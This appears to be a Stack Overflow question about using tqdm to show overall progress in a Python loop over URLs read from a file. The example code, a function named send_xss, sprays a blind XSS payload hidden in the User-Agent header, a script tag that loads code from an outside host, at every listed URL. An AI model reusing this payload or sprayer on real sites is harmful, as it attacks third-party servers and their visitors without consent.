# How to use tqdm alongside a loop reading each line in a file?

Tags: python-3.x

I have a for-loop to read line by line from a file. I use a try statement in this loop. 
 I'd like to know how a tqdm can be used to check progress?

I have tried many methods but failed. 
 My output : 
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 712.34it/s]
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 674.33it/s]
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 543.35it/s]

I get this one passive output for each request. Does this mean that if I have file that contains 100 urls, my code will output 100 tqdm passive results line ?

How can I check global progress instead ?

```py
def send_xss(filee):
    urls_file = open(filee , 'r') #open the file to Reading
    timeout = 0.5 # Specified Timeout => [used in timeouting printer and request sender]
    
    # Looping To Count File Lines
    count = 0
    with open(filee , 'r') as f:
        for line in f:
            count +=1

    for url in urls_file:
        url=url.strip()

        try:
            req = requests.get(url=url,headers={'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko "><script src=https://useagent.xss.ht></script>) Chrome/81.0.4044.138 Safari/537.36 OPR/68.0.3618.125'})
                
        except:
            pass
        
        for i in tqdm(range(count)):
            time.sleep(0.001)

        time.sleep(1) # sleep 1 sec after each request
                          
    urls_file.close()


def('urls.txt') #send paylouds to all urls from this file
```

Comment: Welcome to [so]. Please [edit] your question to detail what you have actually tried, i.e. the code using ``tqdm``, and how this failed, i.e. whether an error was thrown, whether the output was not as expected, etc. See the [mcve] and [ask] page for details how to best help us help you.

Comment: my question is Modified

Comment: I'm not quite following – your use of ``tqdm`` is completely unrelated to reading from the file (or any other sensible action, for that matter). What progress *do* you want to track?

Comment: `for url in tqdm(urls_file): ...`

Comment: thank you for reply i am edit my code to this and get output : 10it [00:00, 334.42it/s] but not sohw design [tqdm]